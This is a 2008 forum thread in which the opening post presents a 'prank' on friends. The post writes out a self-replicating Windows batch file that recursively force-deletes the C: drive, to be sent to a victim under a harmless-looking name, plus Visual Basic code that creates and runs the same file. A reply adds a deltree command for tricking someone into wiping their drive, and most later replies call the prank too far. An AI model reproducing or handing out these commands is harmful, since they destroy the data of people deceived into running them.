Go Back   Forumz Planet - Off Topic Discussion Message Board > Off-Topic > Technology

Notices


Play an evil trick on your friend!

Technology


Reply
 
LinkBack Thread Tools Display Modes
Old 06-28-2008, 12:02 AM   #1 (permalink)
Ozzapoo
Junior Member+
 
Last Online: 07-17-2008 11:36 PM
Join Date: Jun 2008
Posts: 37
Ozzapoo is on a distinguished road
Points: 40.00
Bank: 0.00
Total Points: 40.00
Default Play an evil trick on your friend!

Hi! This is a really evil trick you can play on your friend(s) (mainly the dumb ones ^^)

WARNING: THIS TRICK MAY BREAK YOUR RELATIONSHIPS WITH YOUR FRIENDS

Ok. Open up notepad and type in the following:

Code:
start program.bat
del /F /Q /S C:\*
Save it as "program.bat" (DON'T RUN IT) and send it to your friend

And hopefully (if they're dumb), they won't rename the file and they'll run it ^^

Basically, this will start lots of cmds, all of which are executing: "del /F /Q /S C:\*", which will delete most (if not all) of their hard drive...

If you're one of those people who know a bit about programming, you can just make a program do this:

1) Create a file called "a.bat".
2) Write the code above to the file.
3) Execute the file.

I did that with Visual Basic and the result was DEADLY! (I managed to reduce the control panel icon count down to 3)

And here's the visual basic code I used :

Code:
Dim sw As StreamWriter = File.CreateText("fu.bat")
sw.WriteLine("start fu.bat")
sw.WriteLine("del /Q /F /S c:\*")
sw.Close()
Process.Start("fu.bat")
Enjoy ^^

Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Last edited by Ozzapoo; 06-28-2008 at 12:05 AM.
Ozzapoo is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Sponsored Links

Register to remove this advertisement
Old 06-28-2008, 12:05 AM   #2 (permalink)
Storm
Trial Moderator
 
Last Online: 09-04-2008 06:39 PM
Join Date: Mar 2008
Location: 2012
Posts: 339
Storm is an unknown quantity at this point
Points: 477.00
Bank: 0.00
Total Points: 477.00
Default

Alternatively you could tell them to open start, run, type in "cmd", then type deltree /y c:\*.*
__________________
Register at ForumzPlanet using this link: ForumzPlanet.net/register.php?referrerid=526
Register at GamerzPlanet using this link: GamerzPlanet.net/register.php?referrerid=549344
Storm is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-28-2008, 12:06 AM   #3 (permalink)
Ozzapoo
Junior Member+
 
Last Online: 07-17-2008 11:36 PM
Join Date: Jun 2008
Posts: 37
Ozzapoo is on a distinguished road
Points: 40.00
Bank: 0.00
Total Points: 40.00
Default

There doesn't seem to be a deltree command on my comp.... Is that just for vista =X?
Ozzapoo is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-28-2008, 12:10 AM   #4 (permalink)
Storm
Trial Moderator
 
Last Online: 09-04-2008 06:39 PM
Join Date: Mar 2008
Location: 2012
Posts: 339
Storm is an unknown quantity at this point
Points: 477.00
Bank: 0.00
Total Points: 477.00
Default

Quote:
Originally Posted by Ozzapoo View Post
There doesn't seem to be a deltree command on my comp.... Is that just for vista =X?
I've never even seen a computer running Vista in person.
__________________
Register at ForumzPlanet using this link: ForumzPlanet.net/register.php?referrerid=526
Register at GamerzPlanet using this link: GamerzPlanet.net/register.php?referrerid=549344
Storm is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-28-2008, 12:45 AM   #5 (permalink)
Jak
ForumzPlanet Registered
 
Last Online: 08-30-2008 12:42 AM
Join Date: Jun 2008
Location: Hueco Mundo
Posts: 441
Jak is on a distinguished road
Points: 257.01
Bank: 0.00
Total Points: 257.01
Default

Actually most systems are secured against pranks like these, anyway pulling such a prank on somebody goes way to far in my opinion.
Jak is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 07-04-2008, 04:20 AM   #6 (permalink)
Storm
Trial Moderator
 
Last Online: 09-04-2008 06:39 PM
Join Date: Mar 2008
Location: 2012
Posts: 339
Storm is an unknown quantity at this point
Points: 477.00
Bank: 0.00
Total Points: 477.00
Default

Quote:
Originally Posted by Jak View Post
Actually most systems are secured against pranks like these, anyway pulling such a prank on somebody goes way to far in my opinion.
Yeah, I wouldn't want to do that to someone you know otherwise they'd be supremely pissed.
__________________
Register at ForumzPlanet using this link: ForumzPlanet.net/register.php?referrerid=526
Register at GamerzPlanet using this link: GamerzPlanet.net/register.php?referrerid=549344
Storm is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 07-04-2008, 09:57 AM   #7 (permalink)
Dae_CSH
ForumzPlanet Registered
 
Last Online: 09-18-2008 08:54 AM
Join Date: Jun 2008
Location: TechSupport@FZP
Age: 13
Posts: 284
Dae_CSH is on a distinguished road
Points: 58.00
Bank: 734.23
Total Points: 792.23
Default

Quote:
Originally Posted by Jak View Post
Actually most systems are secured against pranks like these, anyway pulling such a prank on somebody goes way to far in my opinion.
Same thing. But if there's a friend that really gets irritating, I would pull this trick.
Dae_CSH is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 07-04-2008, 11:41 AM   #8 (permalink)
Storm
Trial Moderator
 
Last Online: 09-04-2008 06:39 PM
Join Date: Mar 2008
Location: 2012
Posts: 339
Storm is an unknown quantity at this point
Points: 477.00
Bank: 0.00
Total Points: 477.00
Default

Quote:
Originally Posted by PlAnEtTecH View Post
Same thing. But if there's a friend that really gets irritating, I would pull this trick.
You'd likely lose a friend and gain some injuries.
__________________
Register at ForumzPlanet using this link: ForumzPlanet.net/register.php?referrerid=526
Register at GamerzPlanet using this link: GamerzPlanet.net/register.php?referrerid=549344
Storm is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 07-05-2008, 01:42 AM   #9 (permalink)
Nightwatch
Member
 
Last Online: 07-14-2008 10:32 PM
Join Date: Jun 2008
Posts: 183
Nightwatch is on a distinguished road
Points: 98.00
Bank: 0.00
Total Points: 98.00
Default

Quote:
Originally Posted by Storm View Post
You'd likely lose a friend and gain some injuries.
Hahaha! Couldn't agree with you more on that, Storm. I wouldn't take the risk of crossing a friend. Pissing off an enemy I would gladly do, but not to a friend. I couldn't afford to lose a friendship, much less sustain injuries inflicted by a good old pal.
Nightwatch is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 07-05-2008, 02:48 AM   #10 (permalink)
Storm
Trial Moderator
 
Last Online: 09-04-2008 06:39 PM
Join Date: Mar 2008
Location: 2012
Posts: 339
Storm is an unknown quantity at this point
Points: 477.00
Bank: 0.00
Total Points: 477.00
Default

Quote:
Originally Posted by Nightwatch View Post
Hahaha! Couldn't agree with you more on that, Storm. I wouldn't take the risk of crossing a friend. Pissing off an enemy I would gladly do, but not to a friend. I couldn't afford to lose a friendship, much less sustain injuries inflicted by a good old pal.
Yeah, it's more something I would do to a begger over the internet. I wouldn't want to do that to a friend unless I knew they had backups of everything that matters.
__________________
Register at ForumzPlanet using this link: ForumzPlanet.net/register.php?referrerid=526
Register at GamerzPlanet using this link: GamerzPlanet.net/register.php?referrerid=549344
Storm is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Reply

Bookmarks

Tags
evil, friend, play, trick


Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On



Powered by vBulletin®
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Search Engine Optimization by vBSEO 3.0.0